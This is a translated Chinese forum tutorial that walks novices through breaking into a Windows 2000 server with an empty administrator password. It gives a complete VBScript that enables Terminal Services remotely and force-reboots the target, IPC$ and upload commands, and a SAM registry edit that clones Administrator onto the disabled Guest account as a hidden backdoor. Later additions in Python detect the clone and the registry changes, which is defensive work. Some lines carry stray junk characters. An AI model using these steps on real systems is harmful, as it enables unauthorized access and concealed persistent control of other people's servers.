A simple 3389 intrusion, step by step
Original author: caozhe (草哲)
Source: 中国欲网技术论坛 -- 草哲
I have seen a great many articles online teaching you how to break into this or that, and I think a newbie simply cannot understand them!

So I had an idea: write something simpler, suitable for newbies, and share what I have learned with everyone!
For the intrusion, I recommend working from a Windows 2000 machine.
First, to break in you need tools. Let me recommend a few programs, the ones I have been using all along:
For scanning: X-Scan V2.3, WINNTAutoAttack, and 流光 (Fluxay).
I rarely use X-Scan these days; I mostly use WINNTAutoAttack, though of course I also use 小榕's 流光 often.
Remotely enabling Terminal Services only takes a script; the code is in the second post of the thread (reproduced at the end of this article). Save it as *.vbe (I saved mine as rots.vbe).
For cloning the account, psu is all you need.
OK. Suppose the scan has found a server with a weak NT password: its IP address is 120.0.0.1, the administrator account is administrator, and the password is empty.
Open CMD (the DOS prompt under 2000); we are going to enable Terminal Services on it.
The command is:
cscript rots.vbe 120.0.0.1 administrator "" 3389 /fr
That should be easy to follow: cscript rots.vbe is the command; after it come the IP, then the administrator account, then the password (the administrator password on 120.0.0.1 is empty, so a pair of double quotes stands for the empty password), then the port (you can set the terminal port to anything you like), and finally /fr, the reboot switch (a forced reboot, which I usually use; /r does a normal reboot).
Terminal Services exists only in Windows 2000 Server and above (Server included), so Professional will not work; this version of the script checks the target's OS version and, if it is Professional, prompts you to abort the installation.

If all goes well, you will be able to connect to the terminal shortly. You can ping the target to see whether it has rebooted: ping 120.0.0.1 -t
Once it is back up, connect with a Terminal Services client. Now let's clone an account, heh, to make things convenient later on.

Back at the DOS prompt, we set up an IPC$ connection:
net use \\120.0.0.1\ipc$ "" /user:"administrator"
I think this command needs no explanation. Once it completes, upload psu to the target's winnt\system32 directory (admin$ is the share for the Windows directory):
copy psu.exe \\120.0.0.1\admin$\system32
Upload done; now we build the backdoor account on the zombie (肉鸡, the compromised box). Over to the zombie!

Assume the guest account is disabled; guest is exactly what we will turn into the backdoor account.
Run CMD on that server and type at the command line:
psu -p regedit -i PID
To explain: PID is the process ID of the system process winlogon. Right-click the taskbar and open Task Manager,
go to the Processes tab and find the winlogon process; the number next to it is winlogon's PID. Say it is 5458.
Then the command becomes:
psu -p regedit -i 5458
This opens Registry Editor under winlogon's token, which is what lets you read the local SAM: by default the HKLM\SAM hive is readable only by SYSTEM, not by members of Administrators.
Open the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
Under it is the local user information. What we want is to clone the disabled guest into an account with administrator privileges.
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
Look at the type shown for administrator: it is 0x1f4; now look at guest's: 0x1f5. (These are the accounts' RIDs in hex: 500 and 501.)
Knowing the types, open
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
Double-click the F value on the right and copy the jumble of bytes in it, then open
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
Double-click the F value on the right and paste in what you just copied.
When that is done, export the two keys HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
and HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest,
delete both keys, then import the exported files back. Close Registry Editor.

Open CMD and type at the command line:
net user guest password
This sets a password on guest; "password" at the end is the password itself.
Then type:
net user guest /active:y
This enables the guest account. Then we disable it again:
net user guest /active:n
These three commands must be run from the DOS prompt.
OK, that's it. Open Computer Management and look at the users: see, the guest account still shows as disabled! Ha ha, but it now has administrator privileges,
and it is not listed in the Administrators group, yet it can log on to the terminal exactly like the administrator account.
" z. Y4 b2 }6 i% i- U4 F" e c注销一下,用guest登陆吧!/ q4 {" S3 I. q1 B/ e$ y4 b/ o+ s
All this typing has worn me out! Not easy at all! Heh, I hope everyone can follow the above!
If anything is still unclear, ask me; whatever I know, I will tell you!
I am only a newbie myself, and having learned a little I hardly know what to do with it, heh! If anything is wrong, I hope the experts will correct me!

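Before the script, a small model of what the account-cloning steps above actually change in the SAM, written as an added example (Python; not part of the original post and not psu's code). It works on constructed byte blobs, not on a real hive: only the two fields the trick depends on are filled in, using the user_F layout documented by chntpw (account RID as the little-endian DWORD at offset 0x30, ACB account-control flags as the WORD at offset 0x38, 80-byte record). The Users subkey names are the RID in zero-padded hex, so 000001F4 is 500 (Administrator) and 000001F5 is 501 (Guest). Pasting Administrator's F into Guest's subkey puts RID 500 into a subkey named for RID 501; find_clones() is the defender's check for exactly that mismatch, and it also shows why Computer Management still reports guest as disabled: the disabled bit lives in the same F value that was just overwritten and re-disabled.

```python
# Model of the SAM "F" clone from the walkthrough above, on constructed data.
# Offsets follow the user_F layout documented by chntpw: RID = little-endian
# DWORD at 0x30, ACB account-control flags = WORD at 0x38; the record is 80 bytes.
import struct

F_SIZE = 0x50
OFF_RID = 0x30
OFF_ACB = 0x38

ACB_DISABLED = 0x0001   # account disabled ("net user x /active:n")
ACB_PWNOTREQ = 0x0004   # no password required
ACB_NORMAL = 0x0010     # ordinary user account


def make_f(rid, acb):
    """Build a synthetic F blob: zero filler with only RID and ACB set (constructed data)."""
    buf = bytearray(F_SIZE)
    struct.pack_into("<I", buf, OFF_RID, rid)
    struct.pack_into("<H", buf, OFF_ACB, acb)
    return bytes(buf)


def parse_f(blob):
    """Return the RID and account-control flags stored inside an F value."""
    if len(blob) < OFF_ACB + 2:
        raise ValueError("F value too short: %d bytes" % len(blob))
    (rid,) = struct.unpack_from("<I", blob, OFF_RID)
    (acb,) = struct.unpack_from("<H", blob, OFF_ACB)
    return {"rid": rid, "acb": acb, "disabled": bool(acb & ACB_DISABLED)}


def subkey_rid(subkey):
    """Users\\000001F5 -> 501: the subkey name is the RID in zero-padded hex."""
    return int(subkey, 16)


def fresh_sam():
    """Stand-in for HKLM\\SAM\\SAM\\Domains\\Account\\Users on a clean box:
    Names\\<account> gives the RID, Users\\<hex RID> holds that account's F value."""
    return {
        "Names": {"Administrator": 0x1F4, "Guest": 0x1F5},
        "000001F4": {"F": make_f(500, ACB_NORMAL)},
        "000001F5": {"F": make_f(501, ACB_NORMAL | ACB_DISABLED | ACB_PWNOTREQ)},
    }


def clone_account(sam, src_name, dst_name):
    """The regedit steps: paste src's F over dst's F. The later 'net user <dst>
    /active:y' and '/active:n' are modelled as toggling the ACB disabled bit in
    dst's own subkey, which is where Computer Management reads the flag from."""
    src_key = "%08X" % sam["Names"][src_name]
    dst_key = "%08X" % sam["Names"][dst_name]
    f = bytearray(sam[src_key]["F"])                 # Administrator's F, RID 500 inside
    (acb,) = struct.unpack_from("<H", f, OFF_ACB)
    struct.pack_into("<H", f, OFF_ACB, acb | ACB_DISABLED)
    sam[dst_key]["F"] = bytes(f)
    return sam


def find_clones(sam):
    """Defender check: any Users\\<RID> subkey whose embedded RID differs from the
    RID in its own name has been tampered with. Returns (subkey, name_rid, f_rid)."""
    hits = []
    for subkey, values in sam.items():
        if subkey == "Names":
            continue
        f_rid = parse_f(values["F"])["rid"]
        if f_rid != subkey_rid(subkey):
            hits.append((subkey, subkey_rid(subkey), f_rid))
    return hits


if __name__ == "__main__":
    sam = clone_account(fresh_sam(), "Administrator", "Guest")
    guest = parse_f(sam["000001F5"]["F"])
    print("Guest subkey now embeds RID %d, disabled flag %s" % (guest["rid"], guest["disabled"]))
    for subkey, name_rid, f_rid in find_clones(sam):
        print("cloned account: %s is named for RID %d but carries RID %d" % (subkey, name_rid, f_rid))
```

On a real system the same comparison can be made by reading each Users subkey's F value as SYSTEM (the reason the walkthrough needs psu in the first place) and checking the DWORD at 0x30 against the subkey name; a mismatch is the signature of this clone, whatever the account's displayed name or group membership says.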
4 Z4 |1 U" z6 i+ c8 N----------------------------------------------------------------------
Below is the script for enabling Terminal Services; save it as *.vbe (for example rots.vbe).

' ROTS: enable Terminal Services on a remote Windows 2000 Server over WMI (DCOM/RPC).
' Needs administrator credentials on the target; the changes take effect after a reboot.
on error resume next
set outstreem=wscript.stdout
set instreem=wscript.stdin
' If started by double-click (wscript.exe), relaunch under cscript so stdin/stdout work.
if (lcase(right(wscript.fullname,11))="wscript.exe") then
    set objShell=wscript.createObject("wscript.shell")
    objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
    wscript.quit
end if
if wscript.arguments.count<3 then
    usage()
    wscript.echo "Not enough parameters."
    wscript.quit
end if

ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
if wscript.arguments.count>3 then
    port=wscript.arguments(3)
else
    port=3389
end if
' Arguments arrive as strings. Convert before the range check: in VBScript a string
' compared with a number always sorts above it, so "port>65000" used to reject every
' explicitly given port.
if not isnumeric(port) then
    wscript.echo "Invalid port number."
    wscript.quit
end if
port=clng(port)
if port<1 or port>65000 then
    wscript.echo "Invalid port number."
    wscript.quit
end if
if wscript.arguments.count>4 then
    reboot=wscript.arguments(4)
else
    reboot=""
end if

usage()
outstreem.write "Connecting "&ipaddress&" ...."
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
showerror(err.number)
' 23 = wbemPrivilegeRemoteShutdown, 18 = wbemPrivilegeShutdown: required by Win32Shutdown below.
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true

outstreem.write "Checking OS type...."
set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")
for each objinstoscaption in colinstoscaption
    if instr(objinstoscaption.caption,"Server")>0 then
        wscript.echo "OK!"
    else
        ' Windows 2000 Professional has no Terminal Services; the registry writes would be useless.
        wscript.echo "OS type is "&objinstoscaption.caption
        outstreem.write "Do you want to cancel setup?[y/n]"
        strcancel=instreem.readline
        if lcase(strcancel)<>"n" then wscript.quit
    end if
next

outstreem.write "Writing into registry ...."
set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
HKLM=&h80000002
HKU=&h80000003
with objinstreg
    ' Offline Files (netcache) and Terminal Services are mutually exclusive on Windows 2000, so switch it off.
    .createkey HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
    .setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0
    ' Let Windows Installer run inside a remote Terminal Services session.
    .createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"
    .setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1
    ' Turn Terminal Services on and set the driver and the service to start automatically (2).
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2
    .setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"
    ' RDP listener port (3389 unless another port was given).
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port
end with
showerror(err.number)

' Win32Shutdown flags: 2 = reboot, 6 = reboot + force (4).
rebt=lcase(reboot)
flag=0
if rebt="/r" or rebt="-r" or rebt="\r" then flag=2
if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6
if flag<>0 then
    outstreem.write "Now, reboot target...."
    strwqlquery="select * from win32_operatingsystem where primary='true'"
    set colinstances=objswbemservices.execquery(strwqlquery)
    for each objinstance in colinstances
        objinstance.win32shutdown(flag)
    next
    showerror(err.number)
else
    wscript.echo "You need to reboot target."&vbcrlf&"Then,"
end if
wscript.echo "You can logon terminal services on "&port&" later. Good luck!"

function showerror(errornumber)
    if errornumber Then
        wscript.echo "Error 0x"&cstr(hex(err.number))&" ."
        if err.description <> "" then
            wscript.echo "Error description: "&err.description&"."
        end if
        wscript.quit
    else
        wscript.echo "OK!"
    end if
end function

function usage()
    wscript.echo string(79,"*")
    wscript.echo "ROTS v1.05"
    wscript.echo "Remote Open Terminal services Script, by 草哲"
    wscript.echo "Welcome to visit www.5458.net"
    wscript.echo "Usage:"
    wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"
    wscript.echo "port: default number is 3389."
    wscript.echo "/r: auto reboot target."
    wscript.echo "/fr: auto force reboot target."
    wscript.echo string(79,"*")&vbcrlf
end function

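A defender-side check for what the script leaves behind, added here as an example (Python; not part of the original post and not ROTS code). Given a regedit 5.00 export of HKLM (what "regedit /e" produces), it parses the exact keys ROTS writes and reports whether Terminal Services has been switched on, whether TermDD and TermService are set to auto-start, and whether RDP-Tcp listens on a non-default port. The export text embedded below is constructed sample data, not a capture from a real host; it mirrors the script's writes except that the port was moved to 4489 (0x1189) to show the non-default case.

```python
# Audit a regedit export for the Terminal Services settings the ROTS script writes.
import re

HKLM = "HKEY_LOCAL_MACHINE"
TS_KEY = HKLM + r"\SYSTEM\CurrentControlSet\Control\Terminal Server"
RDP_KEY = TS_KEY + r"\WinStations\RDP-Tcp"
TERMSERVICE_KEY = HKLM + r"\SYSTEM\CurrentControlSet\Services\TermService"
TERMDD_KEY = HKLM + r"\SYSTEM\CurrentControlSet\Services\TermDD"
INSTALLER_KEY = HKLM + r"\SOFTWARE\Policies\Microsoft\Windows\Installer"
SERVICE_AUTO_START = 2          # "Start"=2 means automatic start
DEFAULT_RDP_PORT = 3389

# Constructed sample export (not from a real host): the state ROTS leaves, port moved to 4489.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001
"ProductVersion"="5.0"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00001189

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000002
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
  74,00,25,00,00,00
"""

_KEY_RE = re.compile(r"^\[(-?)(.+)\]$")
_VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')
_HEX_RE = re.compile(r"^hex(?:\(([0-9a-fA-F]+)\))?:(.*)$")


def _unescape(s):
    return s.replace('\\"', '"').replace("\\\\", "\\")


def _decode_value(raw):
    """Right-hand side of a .reg value line -> int, str, list or bytes."""
    if raw.startswith("dword:"):
        return int(raw[6:], 16)
    if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
        return _unescape(raw[1:-1])
    m = _HEX_RE.match(raw)
    if m:
        data = bytes(int(b, 16) for b in m.group(2).split(",") if b)
        kind = int(m.group(1), 16) if m.group(1) else 3      # bare "hex:" is REG_BINARY
        if kind in (1, 2):                                   # REG_SZ / REG_EXPAND_SZ, UTF-16LE
            return data.decode("utf-16-le").rstrip("\x00")
        if kind == 7:                                        # REG_MULTI_SZ
            return [s for s in data.decode("utf-16-le").split("\x00") if s]
        return data
    return raw                                               # e.g. "-" (value deletion)


def parse_reg(text):
    """Return {key_path: {value_name: value}}; a trailing backslash continues a hex value."""
    keys, current, pending = {}, None, []
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):
            pending.append(line[:-1])
            continue
        if pending:
            line, pending = "".join(pending) + line, []
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        m = _KEY_RE.match(line)
        if m:
            if m.group(1) == "-":                            # [-HKEY...] deletes the key
                keys.pop(m.group(2), None)
                current = None
            else:
                current = keys.setdefault(m.group(2), {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            name = "" if m.group(1) == "@" else _unescape(m.group(1)[1:-1])
            current[name] = _decode_value(m.group(2))
    return keys


def terminal_services_report(reg):
    """Summarise the keys ROTS touches and list what a defender should notice."""
    ts, rdp, pol = reg.get(TS_KEY, {}), reg.get(RDP_KEY, {}), reg.get(INSTALLER_KEY, {})
    svc, drv = reg.get(TERMSERVICE_KEY, {}), reg.get(TERMDD_KEY, {})
    port = rdp.get("PortNumber", DEFAULT_RDP_PORT)
    report = {
        "ts_enabled": ts.get("TSEnabled") == 1,
        "termservice_autostart": svc.get("Start") == SERVICE_AUTO_START,
        "termdd_autostart": drv.get("Start") == SERVICE_AUTO_START,
        "admin_ts_remote": pol.get("EnableAdminTSRemote") == 1,
        "rdp_port": port,
        "findings": [],
    }
    if report["ts_enabled"] and report["termservice_autostart"] and report["termdd_autostart"]:
        report["findings"].append("Terminal Services enabled; TermDD and TermService set to auto-start")
    if port != DEFAULT_RDP_PORT:
        report["findings"].append("RDP-Tcp PortNumber is %d, not the default %d" % (port, DEFAULT_RDP_PORT))
    if report["admin_ts_remote"]:
        report["findings"].append("EnableAdminTSRemote=1 (Windows Installer allowed from TS sessions)")
    return report


if __name__ == "__main__":
    for finding in terminal_services_report(parse_reg(SAMPLE_REG))["findings"]:
        print("-", finding)
```

Run against an export taken before and after a suspected intrusion, the three findings together (TSEnabled flipped to 1, both Start values at 2, a PortNumber that is not 3389) are the footprint of this script; a moved port alone is also a reason to look at who connected to that port, since the walkthrough recommends choosing one freely.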
Reposted from 安全焦点 (XFocus)